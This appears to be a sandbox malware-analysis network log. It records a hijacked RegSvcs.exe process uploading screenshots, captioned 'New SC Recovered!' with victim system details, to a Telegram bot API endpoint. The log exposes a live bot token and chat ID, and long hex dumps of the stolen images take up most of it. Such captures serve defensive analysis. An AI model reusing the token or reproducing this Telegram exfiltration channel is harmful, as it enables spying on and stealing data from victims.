2024-12-06 04:54:31 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:54:31 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:54:31 UTC	1358	OUT	Data Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4 Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?ImyM c`:h(%mX:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
2024-12-06 04:54:31 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 66 63 66 62 62 33 30 32 37 63 33 2d 2d 0d 0a Data Ascii: -----------------------------8dd6fcfbb3027c3--
2024-12-06 04:54:32 UTC	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50032	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:54:33 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd725dd3d8b1e0 Host: api.telegram.org Content-Length: 66944 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:54:34 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 32 35 64 64 33 64 38 62 31 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 32 35 64 64 33 64 38 62 31 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 30 33 2f 32 30 32 35 20 30 33 3a 31 35 3a 34 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd725dd3d8b1e0Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd725dd3d8b1e0Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/03/2025 03:15:45User
2024-12-06 04:54:34 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:54:34 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:54:34 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:54:34 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:54:34 UTC	1358	OUT	Data Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4 Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?ImyM c`:h(%mX:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
2024-12-06 04:54:34 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 32 35 64 64 33 64 38 62 31 65 30 2d 2d 0d 0a Data Ascii: -----------------------------8dd725dd3d8b1e0--
2024-12-06 04:54:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:54:35 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:54:34 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170416,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460874,"document":{"file_name":"user-610930 2025-04-03 03-15-46.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZsGdSg4pTRa53_U4dSdGmtj_a_NguAAL9FAACOh6ZUjveaZL2PionAQAHbQADNgQ","file_unique_id":"AQAD_RQAAjoemVJy","file_size":12290,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZsGdSg4pTRa53_U4dSdGmtj_a_NguAAL9FAACOh6ZUjveaZL2PionAQAHbQADNgQ","file_unique_id":"AQAD_RQAAjoemVJy","file_size":12290,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmbBnUoOKU0Wud_1OHUnRprY_2vzYLgAC_RQAAjoemVI73mmS9j4qJzYE","file_unique_id":"AgAD_RQAAjoemVI","file_size":66323},"caption":"New SC Recovered!\n\nTime: 04/03/2025 03:15:45\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50034	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:54:38 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd7790d94bd903 Host: api.telegram.org Content-Length: 68584 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:54:39 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 37 39 30 64 39 34 62 64 39 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 37 39 30 64 39 34 62 64 39 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 30 39 2f 32 30 32 35 20 31 37 3a 35 33 3a 33 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd7790d94bd903Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd7790d94bd903Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/09/2025 17:53:35User
2024-12-06 04:54:39 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:54:39 UTC	16355	OUT	Data Raw: 49 19 c8 e9 b8 e6 a5 d2 26 23 57 88 a9 e3 0d bb e9 83 ff 00 d6 aa 3f 61 97 38 59 54 af bd 5f b0 89 2d 49 3b b2 ed c1 6a f6 71 98 ea 0f 0d 2a 74 f5 ba b5 bd 4f 3b 0f 84 ac a5 ef a3 a5 8e 5d f3 7b 0a cb d6 a4 12 5c 27 fb bf d4 d3 85 d8 44 c0 3c 9a a1 3c a6 59 4b f6 e8 2b cc c9 30 f2 fa c7 b4 e8 91 e5 f1 03 8d 3c 3a 83 dd bf c8 8e 8a 28 af b0 3e 28 28 a2 8a 00 ef c9 aa 4c 7f 7c ff 00 ef 1a b8 4d 51 c8 69 18 8e 84 e6 bf 3d 9b 3f 40 89 32 57 29 aa 42 f0 ea 13 07 18 de c5 d7 dc 13 5d 52 57 3f e2 3f f8 ff 00 8f fe b9 0f e6 6b d5 c9 66 e3 5d c7 ba 3c 9c e2 09 d0 52 ec cc 9a 29 69 2b eb 4f 95 0a 28 a2 81 95 75 1f f5 0b fe f7 f4 35 d4 e9 f2 ab f8 76 db 57 24 79 b6 36 b3 44 3f de e0 2f e9 fc eb 99 bc 89 e5 84 2a 0c 90 d9 a9 2c 74 9d 72 ee ca 48 ed 12 56 b5 2f 87 41 Data Ascii: I&#W?a8YT_-I;jqtO;]{\'D<<YK+0<:(>((L\|MQi=?@2W)B]RW??kf]<R)i+O(u5vW$y6D?/,trHV/A
2024-12-06 04:54:39 UTC	16355	OUT	Data Raw: b4 d9 74 7b 38 64 31 cb ac 5b 46 e3 aa b9 00 8f c0 9a f3 d6 39 3d a2 cf 59 e5 52 5b c9 18 d4 56 b7 f6 5e 9f ff 00 41 cb 3f fb e9 7f f8 aa b1 07 87 a2 b9 42 f6 fa 94 52 a0 38 2d 18 0c 33 e9 c1 a6 f1 a9 6f 16 0b 2b 93 da 68 c1 a2 ba 6f f8 46 94 01 fb d4 3c 0f e1 3f 8f 7e f5 cf 5d c6 21 bb 9a 21 d1 1d 97 f2 35 ad 1c 52 ad 2e 54 8e 7c 4e 06 58 78 29 b7 7d 6c 45 49 4b 45 74 9c 22 50 78 04 d1 50 cd 73 0c 65 91 9f 0d 8e 98 34 a4 dd 9d 8b a7 1e 69 a5 63 a9 ff 00 84 51 bf e7 f8 7f df 9f fe ca 8f f8 45 1b fe 7f c7 fd f9 ff 00 ec aa df fc 25 7a 1f fc ff 00 7f e4 27 ff 00 0a 51 e2 ad 0c 90 05 f0 e7 d6 37 1f d2 bc 6e 7c 4f 99 f4 df 56 c2 f6 46 65 e7 86 e4 b6 b7 32 25 d0 95 b7 2a 84 f2 f6 e4 b3 01 d7 3e f5 88 ea d1 bb 23 a9 57 53 82 a7 a8 35 df df a3 c9 6d 88 d0 bb 2c Data Ascii: t{8d1[F9=YR[V^A?BR8-3o+hoF<?~]!!5R.T\|NXx)}lEIKEt"PxPse4icQE%z'Q7n\|OVFe2%*>#WS5m,
2024-12-06 04:54:39 UTC	15447	OUT	Data Raw: 94 82 c4 0c 13 df af 5a 49 7e d6 65 b7 95 ad 91 a4 82 09 60 cc 61 63 56 56 56 0b f2 aa 80 31 b8 f4 eb 5a 34 56 2f 09 4d ab 1d 2b 31 ac 99 42 17 bc 4c 1f b2 40 20 58 3e ce 21 f2 e3 df e5 ed da 47 99 b7 77 5e 7e b5 19 17 2d 01 89 ed dc da 88 d5 52 11 20 0c 8e 0e 77 ee db d4 e5 b3 c7 43 8e c2 b4 e8 a3 ea 94 c3 fb 42 b1 4a e9 22 bd 92 69 4d 9d cc 32 ba 85 40 d3 2b a4 6a 3a 00 02 03 fa d3 26 5b 9b 8d 45 2f bc 88 d0 c5 19 4f 28 e4 ac 9b b3 e6 67 a7 de 2c d9 fa d6 85 14 fe ab 4e c9 3e 84 fd 7e b5 db 5a 5c a3 e6 3d bc b0 3d 8d 9d c4 46 20 e0 6e 9f 25 77 29 51 82 14 63 19 cf 73 c0 e6 a0 6b 05 73 e7 5f 0b ab c9 99 40 69 04 d8 93 23 a7 cc 43 76 f6 ad 5a 29 fd 5a 17 bb 17 d7 6a 68 96 84 69 24 d3 4d 35 c4 cb b5 a4 6c 85 ce 70 31 81 cf 73 ef de 9b 2a e2 58 e6 f2 44 db Data Ascii: ZI~e`acVVV1Z4V/M+1BL@ X>!Gw^~-R wCBJ"iM2@+j:&[E/O(g,N>~Z\==F n%w)Qcsks_@i#CvZ)Zjhi$M5lp1s*XD
2024-12-06 04:54:39 UTC	2998	OUT	Data Raw: bb 05 0c ec 15 46 4f 52 4f 41 ef 40 0c a2 ba 0f ed 2d 33 4d ff 00 89 74 16 b1 df 5a 37 17 53 b0 c3 cc 7d 63 3d 50 2f 6f 5e fe 95 95 a9 da c1 6b 74 16 d6 e9 2e 6d dd 43 c6 e3 ae 0f 66 1f c2 c3 b8 fe 84 52 18 db 1b 0b 8b f7 91 6d c4 7f ba 4f 31 da 49 52 35 55 c8 5c 96 62 07 56 03 f1 ab 72 78 7b 50 89 82 c8 f6 28 c5 43 00 da 85 b8 38 23 20 fd fe 84 10 7f 1a b5 e0 cb d6 b4 d7 e2 85 5a 64 6b c3 1d b0 96 19 02 34 79 95 0e ee 54 82 3e 5c 10 47 20 91 4e d6 b4 dd 77 54 d4 9e ef fb 0f 54 5d c9 1a 7e f6 27 91 ce d4 55 cb 36 d1 92 76 e4 9c 77 a0 0c cb ad 26 ee d2 d4 dc c8 6d de 10 e2 32 d0 dc c5 2e 18 82 40 21 18 e3 21 4f e5 54 6b 72 5d 3a fe c3 c2 f7 9f 6d b2 b8 b6 df 79 6f b3 ce 89 93 76 12 6c e3 23 9e a3 f3 a6 78 6b 3e 75 ef 93 f6 4f b5 fd 9c 7d 9b ed 5e 5e dd fe Data Ascii: FOROA@-3MtZ7S}c=P/o^kt.mCfRmO1IR5U\bVrx{P(C8# Zdk4yT>\G NwTT]~'U6vw&m2.@!!OTkr]:myovl#xk>uO}^^
2024-12-06 04:54:39 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 37 39 30 64 39 34 62 64 39 30 33 2d 2d 0d 0a Data Ascii: -----------------------------8dd7790d94bd903--
2024-12-06 04:54:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:54:40 UTC	1514	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:54:40 GMT Content-Type: application/json Content-Length: 1125 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170417,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460880,"document":{"file_name":"user-610930 2025-04-09 18-03-36.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZsWdSg4_8OQAB1YzwbcPzVkirBpR5UwAC_hQAAjoemVJLIw_HIbV5XQEAB20AAzYE","file_unique_id":"AQAD_hQAAjoemVJy","file_size":12457,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZsWdSg4_8OQAB1YzwbcPzVkirBpR5UwAC_hQAAjoemVJLIw_HIbV5XQEAB20AAzYE","file_unique_id":"AQAD_hQAAjoemVJy","file_size":12457,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmbFnUoOP_DkAAdWM8G3D81ZIqwaUeVMAAv4UAAI6HplSSyMPxyG1eV02BA","file_unique_id":"AgAD_hQAAjoemVI","file_size":67963},"caption":"New SC Recovered!\n\nTime: 04/09/2025 17:53:35\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50035	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:54:54 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd7eb6d4e31816 Host: api.telegram.org Content-Length: 67091 Expect: 100-continue
